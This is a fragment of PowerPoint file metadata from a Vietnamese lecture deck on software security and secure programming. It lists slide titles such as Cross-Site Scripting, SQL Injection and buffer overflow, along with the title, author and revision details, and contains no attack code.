      <vt:lpstr>Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>www.zing.vn</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>Tài liệu tham khảo</vt:lpstr>
      <vt:lpstr>Tài liệu tham khảo</vt:lpstr>
      <vt:lpstr>Frameworks</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Các dạng lỗ hổng phần mềm</vt:lpstr>
      <vt:lpstr>Lỗ hổng tràn bộ đệm</vt:lpstr>
      <vt:lpstr>Lỗ hổng tràn bộ đệm</vt:lpstr>
      <vt:lpstr>Lỗ hổng tràn bộ đệm</vt:lpstr>
      <vt:lpstr>Tràn bộ đệm</vt:lpstr>
      <vt:lpstr>Tràn bộ đệm</vt:lpstr>
      <vt:lpstr>Stack</vt:lpstr>
      <vt:lpstr>Gọi hàm và trở về từ hàm</vt:lpstr>
      <vt:lpstr>Gọi hàm và trở về từ hàm</vt:lpstr>
      <vt:lpstr>Tràn bộ đệm với strcpy(arr, s1)</vt:lpstr>
      <vt:lpstr>Lỗ hổng tràn bộ đệm</vt:lpstr>
      <vt:lpstr>Lỗ hổng tràn bộ đệm</vt:lpstr>
      <vt:lpstr>Tài liệu về lỗ hổng phần mềm</vt:lpstr>
      <vt:lpstr>Tài liệu về lỗ hổng phần mềm</vt:lpstr>
      <vt:lpstr>Frameworks</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>An toàn phần mềm</vt:lpstr>
      <vt:lpstr>Thiết kế phần mềm an toàn</vt:lpstr>
      <vt:lpstr>Tài liệu tham khảo</vt:lpstr>
      <vt:lpstr>Lập trình an toàn</vt:lpstr>
      <vt:lpstr>Tài liệu tham khảo</vt:lpstr>
      <vt:lpstr>Khái niệm</vt:lpstr>
      <vt:lpstr>Kiểm thử an toàn</vt:lpstr>
      <vt:lpstr>Tài liệu tham khảo</vt:lpstr>
      <vt:lpstr>Khai thác an toàn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MẠNG MÁY TÍNH VÀ DỊCH VỤ INTERNET</dc:title>
  <dc:creator>Nguyen Tuan Anh</dc:creator>
  <cp:lastModifiedBy>Anh Tu Tran</cp:lastModifiedBy>
  <cp:revision>94</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-09-14T12:08:34Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-08-29T15:10:20Z</dcterms:modified>
</cp:coreProperties>
</file>